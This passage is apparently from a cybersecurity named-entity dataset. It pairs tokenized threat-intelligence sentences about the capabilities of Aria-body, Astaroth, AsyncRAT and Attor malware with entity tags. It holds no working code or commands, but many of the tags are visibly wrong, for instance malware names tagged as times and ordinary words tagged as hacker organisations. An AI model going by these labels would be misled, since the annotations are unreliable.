- "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "inject", - "itself", - "into", - "another", - "process", - "such", - "as", - "rundll32.exe", - "and", - "dllhost.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "used", - "an", - "encrypted", - "configuration", - "file", - "for", - "its", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "delete", - "files", - "and", - "directories", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "gather", - "metadata", - "from", - "a", - "file", - "and", - "to", - "search", - "for", - "file", - "and", - "directory", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "download", - "additional", - "payloads", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "launch", - "files", - "using", - "<code>ShellExecute</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "used", - "TCP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "enumerate", - "loaded", - "modules", - "for", - "a", - "process.." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "use", - "a", - "reverse", - "SOCKS", - "proxy", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "established", - "persistence", - "via", - "the", - "Startup", - "folder", - "or", - "Run", - "Registry", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "capture", - "screenshots", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "identify", - "the", - "hostname,", - "computer", - "name,", - "Windows", - "version,", - "processor", - "speed,", - "machine", - "GUID,", - "and", - "disk", - "information", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "identify", - "the", - "location,", - "public", - "IP", - "address,", - "and", - "domain", - "name", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "gather", - "TCP", - "and", - "UDP", - "table", - "status", - "listings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "identify", - "the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "the", - "ability", - "to", - "duplicate", - "a", - "token", - "from", - "ntprint.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Aria-body", - "has", - "used", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Arp", - "can", - "be", - "used", - "to", - "display", - "a", - "host's", - "ARP", - "cache,", - "which", - "may", - "include", - "address", - "resolutions", - "for", - "remote", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Arp", - "can", - "be", - "used", - "to", - "display", - "ARP", - "configuration", - "information", - "on", - "the", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "collects", - "information", - "from", - "the", - "clipboard", - "by", - "using", - "the", - "OpenClipboard()", - "and", - "GetClipboardData()", - "libraries." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "has", - "obfuscated", - "and", - "randomized", - "parts", - "of", - "the", - "JScript", - "code", - "it", - "is", - "initiating." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "ActiveX", - "objects", - "for", - "file", - "execution", - "and", - "manipulation." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "an", - "external", - "software", - "known", - "as", - "NetPass", - "to", - "recover", - "passwords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "can", - "launch", - "itself", - "via", - "DLL", - "Search", - "Order", - "Hijacking." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "can", - "store", - "C2", - "information", - "on", - "cloud", - "hosting", - "services", - "such", - "as", - "AWS", - "and", - "CloudFlare", - "and", - "websites", - "like", - "YouTube", - "and", - "Facebook." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-Org", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "a", - "fromCharCode()", - "deobfuscation", - "method", - "to", - "avoid", - "explicitly", - "writing", - "execution", - "commands", - "and", - "to", - "hide", - "its", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "has", - "used", - "a", - "DGA", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "has", - "used", - "an", - "XOR-based", - "algorithm", - "to", - "encrypt", - "payloads", - "twice", - "with", - "different", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "exfiltrates", - "collected", - "information", - "from", - "its", - "r1.log", - "file", - "to", - "the", - "external", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "loads", - "its", - "module", - "with", - "the", - "XSL", - "script", - "parameter", - "<code>vShow</code>", - "set", - "to", - "zero,", - "which", - "opens", - "the", - "application", - "with", - "a", - "hidden", - "window." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "certutil", - "and", - "BITSAdmin", - "to", - "download", - "additional", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "JavaScript", - "to", - "perform", - "its", - "core", - "functionalities." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "logs", - "keystrokes", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "collects", - "data", - "in", - "a", - "plaintext", - "file", - "named", - "r1.log", - "before", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "has", - "used", - "malicious", - "files", - "including", - "VBS,", - "LNK,", - "and", - "HTML", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "can", - "abuse", - "alternate", - "data", - "streams", - "(ADS)", - "to", - "store", - "content", - "for", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "searches", - "for", - "different", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "can", - "create", - "a", - "new", - "process", - "in", - "a", - "suspended", - "state", - "from", - "a", - "targeted", - "legitimate", - "process", - "in", - "order", - "to", - "unmap", - "its", - "memory", - "and", - "replace", - "it", - "with", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "creates", - "a", - "startup", - "item", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "can", - "be", - "loaded", - "through", - "regsvr32.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Astaroth", - "checks", - "for", - "the", - "presence", - "of", - "Avast", - "antivirus", - "in", - "the", - "<code>C:\\Program\\Files\\</code>", - "folder." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "the", - "LoadLibraryExW()", - "function", - "to", - "load", - "additional", - "modules." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth's", - "initial", - "payload", - "is", - "a", - "malicious", - ".LNK", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "a", - "software", - "packer", - "called", - "Pe123\\RPolyCryptor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Astaroth", - "has", - "been", - "delivered", - "via", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "encodes", - "data", - "using", - "Base64", - "before", - "sending", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "can", - "check", - "for", - "Windows", - "product", - "ID's", - "used", - "by", - "sandboxes", - "and", - "usernames", - "and", - "disk", - "serial", - "numbers", - "associated", - "with", - "analyst", - "environments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "collects", - "the", - "machine", - "name", - "and", - "keyboard", - "language", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "collects", - "the", - "external", - "IP", - "address", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "collects", - "the", - "timestamp", - "from", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "an", - "external", - "software", - "known", - "as", - "NetPass", - "to", - "recover", - "passwords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "has", - "used", - "malicious", - "VBS", - "e-mail", - "attachments", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "spawns", - "a", - "CMD", - "process", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "uses", - "WMIC", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Astaroth", - "executes", - "embedded", - "JScript", - "or", - "VBScript", - "in", - "an", - "XSL", - "stylesheet", - "located", - "on", - "a", - "remote", - "domain." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "use", - "the", - "`CheckRemoteDebuggerPresent`", - "function", - "to", - "detect", - "the", - "presence", - "of", - "a", - "debugger." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "be", - "configured", - "to", - "use", - "dynamic", - "DNS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "hide", - "the", - "execution", - "of", - "scheduled", - "tasks", - "using", - "`ProcessWindowStyle.Hidden`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AsyncRAT", - "has", - "the", - "ability", - "to", - "download", - "files", - "over", - "SFTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "capture", - "keystrokes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "has", - "the", - "ability", - "to", - "use", - "OS", - "APIs", - "including", - "`CheckRemoteDebuggerPresent`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "examine", - "running", - "processes", - "to", - "determine", - "if", - "a", - "debugger", - "is", - "present." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "create", - "a", - "scheduled", - "task", - "to", - "maintain", - "persistence", - "on", - "system", - "start-up." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "has", - "the", - "ability", - "to", - "view", - "the", - "screen", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "identify", - "strings", - "such", - "as", - "Virtual,", - "vmware,", - "or", - "VirtualBox", - "to", - "detect", - "virtualized", - "environments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "check", - "the", - "disk", - "size", - "through", - "the", - "values", - "obtained", - "with", - "`DeviceInfo.`" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "check", - "if", - "the", - "current", - "user", - "of", - "a", - "compromised", - "system", - "is", - "an", - "administrator." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AsyncRAT", - "can", - "record", - "screen", - "content", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "can", - "obtain", - "application", - "window", - "titles", - "and", - "then", - "determines", - "which", - "windows", - "to", - "perform", - "Screen", - "Capture", - "on." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "encrypts", - "collected", - "data", - "with", - "a", - "custom", - "implementation", - "of", - "Blowfish", - "and", - "RSA", - "ciphers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Attor's", - "Blowfish", - "key", - "is", - "encrypted", - "with", - "a", - "public", - "RSA", - "key." - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "performs", - "the", - "injection", - "by", - "attaching", - "its", - "code", - "into", - "the", - "APC", - "queue", - "using", - "NtQueueApcThread", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Attor's", - "has", - "a", - "plugin", - "that", - "is", - "capable", - "of", - "recording", - "audio", - "using", - "available", - "input", - "sound", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "automatically", - "collected", - "data", - "about", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "a", - "file", - "uploader", - "plugin", - "that", - "automatically", - "exfiltrates", - "the", - "collected", - "data", - "and", - "log", - "files", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "a", - "plugin", - "that", - "collects", - "data", - "stored", - "in", - "the", - "Windows", - "clipboard", - "by", - "using", - "the", - "OpenClipboard", - "and", - "GetClipboardData", - "APIs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Strings", - "in", - "Attor's", - "components", - "are", - "encrypted", - "with", - "a", - "XOR", - "cipher,", - "using", - "a", - "hardcoded", - "key", - "and", - "the", - "configuration", - "data,", - "log", - "files", - "and", - "plugins", - "are", - "encrypted", - "using", - "a", - "hybrid", - "encryption", - "scheme", - "of", - "Blowfish-OFB", - "combined", - "with", - "RSA." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Attor", - "has", - "exfiltrated", - "data", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor’s", - "plugin", - "deletes", - "the", - "collected", - "files", - "and", - "log", - "files", - "after", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "used", - "FTP", - "protocol", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "a", - "plugin", - "that", - "enumerates", - "files", - "with", - "specific", - "extensions", - "on", - "all", - "hard", - "disk", - "drives", - "and", - "stores", - "file", - "information", - "in", - "encrypted", - "log", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "can", - "set", - "attributes", - "of", - "log", - "files", - "and", - "directories", - "to", - "HIDDEN,", - "SYSTEM,", - "ARCHIVE,", - "or", - "a", - "combination", - "of", - "those." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "can", - "download", - "additional", - "plugins,", - "updates", - "and", - "other", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "of", - "Attor's", - "plugins", - "can", - "collect", - "user", - "credentials", - "via", - "capturing", - "keystrokes", - "and", - "can", - "capture", - "keystrokes", - "pressed", - "within", - "the", - "window", - "of", - "the", - "injected", - "process." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "staged", - "collected", - "data", - "in", - "a", - "central", - "upload", - "directory", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "can", - "establish", - "persistence", - "via", - "adding", - "a", - "Registry", - "key", - "with", - "a", - "logon", - "script", - "<code>HKEY_CURRENT_USER\\Environment", - "\"UserInitMprLogonScript\"", - "</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "disguises", - "itself", - "as", - "a", - "legitimate", - "task", - "(i.e.,", - "the", - "task", - "name", - "and", - "description", - "appear", - "legitimate)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "can", - "modify", - "the", - "Run", - "registry", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "used", - "Tor", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "has", - "used", - "CreateProcessW", - "API", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "a", - "plugin", - "that", - "collects", - "information", - "about", - "inserted", - "storage", - "devices,", - "modems,", - "and", - "phone", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "can", - "inject", - "itself", - "into", - "running", - "processes", - "to", - "gain", - "higher", - "privileges", - "and", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "opened", - "the", - "registry", - "and", - "performed", - "query", - "searches." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "installer", - "plugin", - "can", - "schedule", - "rundll32.exe", - "to", - "load", - "the", - "dispatcher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "installer", - "plugin", - "can", - "schedule", - "a", - "new", - "task", - "that", - "loads", - "the", - "dispatcher", - "on", - "boot/logon." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "has", - "a", - "plugin", - "that", - "captures", - "screenshots", - "of", - "the", - "target", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "can", - "be", - "executed", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor's", - "dispatcher", - "can", - "execute", - "additional", - "plugins", - "by", - "loading", - "the", - "respective", - "DLLs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attor", - "has", - "encrypted", - "data", - "symmetrically", - "using", - "a", - "randomly", - "generated", - "Blowfish", - "(OFB)", - "key", - "which", - "is", - "encrypted", - 